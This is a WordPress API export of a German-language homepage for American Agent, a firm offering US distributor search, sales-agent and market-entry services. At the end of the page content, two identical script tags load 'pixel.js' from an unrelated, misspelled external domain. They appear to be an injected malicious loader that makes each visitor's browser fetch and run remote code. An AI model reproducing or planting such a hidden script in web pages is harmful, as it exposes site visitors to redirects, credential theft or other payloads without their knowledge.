{"id":3123,"date":"2013-04-01T15:37:54","date_gmt":"2013-04-01T15:37:54","guid":{"rendered":"https:\/\/americanagent.com\/homepage-2\/"},"modified":"2014-09-17T09:50:02","modified_gmt":"2014-09-17T13:50:02","slug":"startseite","status":"publish","type":"page","link":"https:\/\/americanagent.com\/de\/","title":{"rendered":"Startseite"},"content":{"rendered":"<div id='layer_slider_1'  class='avia-layerslider main_color avia-shadow  avia-builder-el-0  el_before_av_one_third  avia-builder-el-first  container_wrap sidebar_right'  style='height: 471px;'  ><\/div><div id='after_layer_slider_1'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-3123'><div class='entry-content-wrapper clearfix'>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-1  el_after_av_layerslider  el_before_av_one_third  avia-builder-el-first  first flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-a79dc774c4d621acef6c987dacbbed3a  avia-builder-el-2  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Vertriebspartner und Gesch\u00e4ftspartner suchen\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue803' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Vertriebspartner und Gesch\u00e4ftspartner suchen<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Wir k\u00f6nnen Ihnen helfen die besten amerikanischen Vertriebspartner und Gesch\u00e4ftspartner zu finden.<\/p>\n<div  class='avia-button-wrap av-av_button-82b968f7cea16b54d474d4672d2c94b4-wrap avia-button-center  avia-builder-el-3  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/de\/vertriebspartner-und-geschaeftspartner-finden\/'  class='avia-button av-av_button-82b968f7cea16b54d474d4672d2c94b4 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><div  class='flex_column av-av_one_third-1c47c10d9dd6b9bc0b68f292c1cf5942 av_one_third  avia-builder-el-4  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-d54774ee23018dd2ea58e7ac16e3a46c  avia-builder-el-5  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Direktvertrieb USA\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue881' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Direktvertrieb USA<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Die erfolgreichsten Unternehmen arbeiten und verkaufen in den USA \u00fcber eine Direktvertriebstrategie.<\/p>\n<div  class='avia-button-wrap av-av_button-efa645eb0f51b868e06fa2ef647d1ba7-wrap avia-button-center  avia-builder-el-6  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/de\/direktvertrieb-ihrer-produkte-in-den-usa\/'  class='avia-button av-av_button-efa645eb0f51b868e06fa2ef647d1ba7 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><\/p>\n<div  class='flex_column av-av_one_third-1c47c10d9dd6b9bc0b68f292c1cf5942 av_one_third  avia-builder-el-7  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-5d4cd4bcb96daa374204f71ad1b3e9b7  avia-builder-el-8  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Handelsvertreter suchen\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue80c' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Handelsvertreter suchen<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Wir k\u00f6nnen Ihnen helfen die besten amerikanischen Handelsvertreter zu finden.<\/p>\n<div  class='avia-button-wrap av-av_button-aa23c442b6484208ad320615dd75bbdc-wrap avia-button-center  avia-builder-el-9  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/'  class='avia-button av-av_button-aa23c442b6484208ad320615dd75bbdc av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-10  el_after_av_one_third  el_before_av_one_third  first flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-66634cbcc96e50947203d2e88a30807e  avia-builder-el-11  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Supportleistungen f\u00fcr Unternehmen\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue8c7' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Supportleistungen f\u00fcr Unternehmen<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Etablierte Quelle von Ad-Hoc und externen Leistungen.<\/p>\n<div  class='avia-button-wrap av-av_button-1531847089ccb931862cbf6dd6fced24-wrap avia-button-center  avia-builder-el-12  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/'  class='avia-button av-av_button-1531847089ccb931862cbf6dd6fced24 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-1c47c10d9dd6b9bc0b68f292c1cf5942 av_one_third  avia-builder-el-13  el_after_av_one_third  el_before_av_one_third  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-5945384ca789668c1b012665cb99c97b  avia-builder-el-14  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Hilfe zum USA Markteinstieg\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue84e' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Hilfe zum USA Markteinstieg<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Verf\u00fcgbar in 17 Sprachen.<\/p>\n<div  class='avia-button-wrap av-av_button-4a9ae4879e6604288b3516467eae2681-wrap avia-button-center  avia-builder-el-15  avia-builder-el-no-sibling '><a href='http:\/\/usamarketguide.com\/de\/produkt\/usa-market-guide'  class='avia-button av-av_button-4a9ae4879e6604288b3516467eae2681 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'  target=\"_blank\"  rel=\"noopener noreferrer\"  aria-label=\"Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<p><div  class='flex_column av-av_one_third-1c47c10d9dd6b9bc0b68f292c1cf5942 av_one_third  avia-builder-el-16  el_after_av_one_third  avia-builder-el-last  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-def04253dc60b40b56cc853085ec0a04  avia-builder-el-17  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Kontakt\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue805' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Kontakt<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Wir k\u00f6nnen Ihnen eine Vertriebsl\u00f6sung angepasst and ihre Bed\u00fcrfnisse in den USA zur Verf\u00fcgung stellen.<\/p>\n<div  class='avia-button-wrap av-av_button-ff539df0394e620a48a0250318f1ecd6-wrap avia-button-center  avia-builder-el-18  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/de\/kontakt\/'  class='avia-button av-av_button-ff539df0394e620a48a0250318f1ecd6 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is a Page excerpt. It will be displayed for search results<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3123","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Gesch\u00e4ftspartner in der USA finden<\/title>\n<meta name=\"description\" content=\"Alle ben\u00f6tigten Services f\u00fcr den Direktvertrieb Ihres Produkts and Handelsvertreter und Gesch\u00e4ftspartner in der USA. Jetzt Vertriebspartner werden!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/de\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Gesch\u00e4ftspartner in der USA finden\" \/>\n<meta property=\"og:description\" content=\"Alle ben\u00f6tigten Services f\u00fcr den Direktvertrieb Ihres Produkts and Handelsvertreter und Gesch\u00e4ftspartner in der USA. Jetzt Vertriebspartner werden!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/de\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-17T13:50:02+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - Gesch\u00e4ftspartner in der USA finden\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\"},\"datePublished\":\"2013-04-01T15:37:54+00:00\",\"dateModified\":\"2014-09-17T13:50:02+00:00\",\"description\":\"Alle ben\u00f6tigten Services f\u00fcr den Direktvertrieb Ihres Produkts and Handelsvertreter und Gesch\u00e4ftspartner in der USA. Jetzt Vertriebspartner werden!\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/de\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Startseite\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Gesch\u00e4ftspartner in der USA finden","description":"Alle ben\u00f6tigten Services f\u00fcr den Direktvertrieb Ihres Produkts and Handelsvertreter und Gesch\u00e4ftspartner in der USA. Jetzt Vertriebspartner werden!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/de\/","og_locale":"de_DE","og_type":"article","og_title":"American Agent - Gesch\u00e4ftspartner in der USA finden","og_description":"Alle ben\u00f6tigten Services f\u00fcr den Direktvertrieb Ihres Produkts and Handelsvertreter und Gesch\u00e4ftspartner in der USA. Jetzt Vertriebspartner werden!","og_url":"https:\/\/americanagent.com\/de\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-17T13:50:02+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/de\/","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - Gesch\u00e4ftspartner in der USA finden","isPartOf":{"@id":"https:\/\/americanagent.com\/de\/#website"},"datePublished":"2013-04-01T15:37:54+00:00","dateModified":"2014-09-17T13:50:02+00:00","description":"Alle ben\u00f6tigten Services f\u00fcr den Direktvertrieb Ihres Produkts and Handelsvertreter und Gesch\u00e4ftspartner in der USA. Jetzt Vertriebspartner werden!","breadcrumb":{"@id":"https:\/\/americanagent.com\/de\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/de\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/de\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/de\/"},{"@type":"ListItem","position":2,"name":"Startseite"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/de\/#website","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/comments?post=3123"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3123\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/media?parent=3123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}